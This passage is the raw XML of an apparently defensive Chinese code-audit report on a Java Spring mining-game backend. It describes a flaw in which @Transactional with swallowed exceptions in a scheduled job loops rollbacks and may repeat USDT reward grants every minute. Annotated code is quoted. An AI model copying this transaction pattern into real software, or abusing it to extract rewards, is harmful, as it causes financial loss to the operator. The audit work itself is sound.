        <w:t>@Scheduled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行器记录该异常后继续下一次调度周期</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; ⑦ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>60 秒后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，调度器再次触发，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findExpiredCharging(now)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍然找到上一批未被重置的矿机（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍为 1），再次对相同用户调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，再次执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>claimLevelReward</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键财务风险点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>levelRewardService.claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内部使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>REQUIRES_NEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 传播（财务记账操作的高频惯用模式——目的正是确保账务不因上层事务回滚而丢失），则这两个方法每次调用均会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>独立提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一笔奖励，外层 TX1 的回滚无法撤销它们。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在导致异常的根因未被消除前，每分钟调度器触发一次，就会为受影响用户额外发放一次 USDT 等级奖励与等级礼包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，形成持续性资金漏洞。</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调度入口：PowerScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 60_000)</w:t>
              <w:br/>
              <w:t>@Transactional  // ← 开启外层事务 TX1</w:t>
              <w:br/>
              <w:t>public void resetExpiredCharging() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; expired = userMinerRepository.findExpiredCharging(now); // ← 查询仍处于 isCharged=1 的过期矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (expired.isEmpty()) return;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Set&lt;Long&gt; affectedUserIds = expired.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(UserMiner::getUserId).filter(id -&gt; id != null).collect(Collectors.toSet());</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    for (UserMiner m : expired) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setIsCharged(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setChargedExpireTime(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userMinerRepository.save(m); // ← 矿机状态写入（在 TX1 中，尚未提交）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long userId : affectedUserIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            minerService.recalcUserLevelAndHashRate(userId); // ← 内层 @Transactional(REQUIRED) 加入 TX1</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // ↑ 若此处任何 RuntimeException 向上逸出：</w:t>
              <w:br/>
              <w:t xml:space="preserve">            //   Spring 先将 TX1 标记 rollbackOnly，再重新抛出异常</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) {}</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ← 异常被静默吞噬，但 TX1.rollbackOnly 已不可撤销</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ← 循环继续处理下一个用户，TX1 已是"死亡行军"状态</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← resetExpiredCharging 正常返回</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← Spring @Transactional 代理尝试 commit(TX1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← TX1.isRollbackOnly()==true → 抛出 UnexpectedRollbackException → TX1 全量回滚</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 所有 isCharged=0 写入被撤销；矿机依旧是过期充电状态</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 60s 后调度器重复触发，相同矿机再次被 findExpiredCharging 命中</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 财务操作触发点：MinerService.java</w:t>
              <w:br/>
              <w:t>@Transactional  // ← REQUIRED：加入外层 TX1（与 PowerScheduler 同一事务）</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(us</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>erId, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int maxLevel = miners.stream().mapToInt(UserMiner::getMinerLevel).max().orElse(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal totalHash = computeBaseTotalHashRate(userId); // ← 第二次查询矿机（同一 TX1 内）</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(userId).ifPresent(u -&gt; { // ← FOR UPDATE 锁用户行</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int oldLevel = u.getCurrentLevel() != null ? u.getCurrentLevel() : 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int userNewLevel = Math.max(maxLevel, oldLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentLevel(userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentTotalHashRate(totalHash);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userRepository.save(u); // ← 用户等级写入（在 TX1 中）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userNewLevel &gt; oldLevel) {  // ← 等级升级条件</w:t>
              <w:br/>
              <w:t xml:space="preserve">            taskExecutionService.updateProgress(u.getId(), "8", 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            grantUsdtOnLevelUp(userId, oldLevel + 1, userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // ↑ 关键财务操作：若此方法内使用 REQUIRES_NEW，USDT 已独立提交</w:t>
              <w:br/>
              <w:t xml:space="preserve">            //   TX1 后续回滚无法撤销已提交的 USDT 发放</w:t>
              <w:br/>
              <w:t xml:space="preserve">            //   下一分钟调度器重入，相同 userNewLevel &gt; oldLevel 条件成立（因 TX1 回滚致 user.currentLevel 未更新）</w:t>
              <w:br/>
              <w:t xml:space="preserve">            //   → grantUsdtOnLevelUp 再次执行 → USDT 再次发放</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardService.claimLevelReward(userId, userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // ↑ 同上，等级礼包（金币/电力/矿机/加速卡）面临同等重复发放风险</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userSeasonService.updateSeasonData(userId, maxLevel, maxStarLevel, totalHash);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑ 若此处或以上任意位置抛出 RuntimeException → TX1 标记 rollbackOnly → 触发完整回滚路径</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触发路径与实际影响分析：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1261"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用链中任意位置抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 数据异常、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userSeasonService.updateSeasonData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 外部调用超时、DB 死锁等边界条件），即可触发此路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1262"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>受影响用户范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：一旦批次中任意一个用户触发异常，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>本批次所有用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的矿机状态重置均被回滚，所有受影响用户均进入重复调度循环。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1263"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最坏情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>REQUIRES_NEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 独立事务，且触发异常的根因持续存在（如某个特定用户数据状态），则每分钟一次地为该用户发放 USDT 等级奖励，直到人工干预或数据状态修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1264"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>即使无 `REQUIRES_NEW`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：矿机充电状态永久无法通过调度任务正常重置，系统数据处于持续不一致状态，算力计算结果偏高（充电加成无法按时失效），影响整体挖矿收益公平性。</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权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1265"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：否（定时任务服务端自动执行，无需任何外部触发）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1266"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：无需任何用户权限，服务启动后自动运行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>POC 类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：事务失效类代码缺陷，无 HTTP 入口，无需 HTTP POC；需通过制造 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用链中的异常条件（如特定用户数据状态导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateSeasonData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 失败）可复现</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268"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerScheduler.java.resetExpiredCharging → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getStarBonusPercent</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audit_m264_1143_resetExpiredCharging_ctrl-path2of8.md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：PowerScheduler.java#resetExpiredCharging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_60" w:id="60"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞59：定时任务 @Transactional + 异常吞噬导致充电过期重置全批次回滚、用户算力永久膨胀</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1269"/>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resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 事务语义缺陷——异常吞噬污染共享事务，致已过期充电状态永久无法重置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1270"/>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src/main/java/com/gameBack/mjservice/scheduler/PowerScheduler.java:resetExpiredCharging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1271"/>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事务语义缺陷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1272"/>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73"/>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：无需任何权限（由调度框架内部触发，非 HTTP 入口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1274"/>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resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 标注，在同一事务 T1 内循环调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerService.recalcUserLevelAndHashRate(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，后者同样标注了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（默认传播级别 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
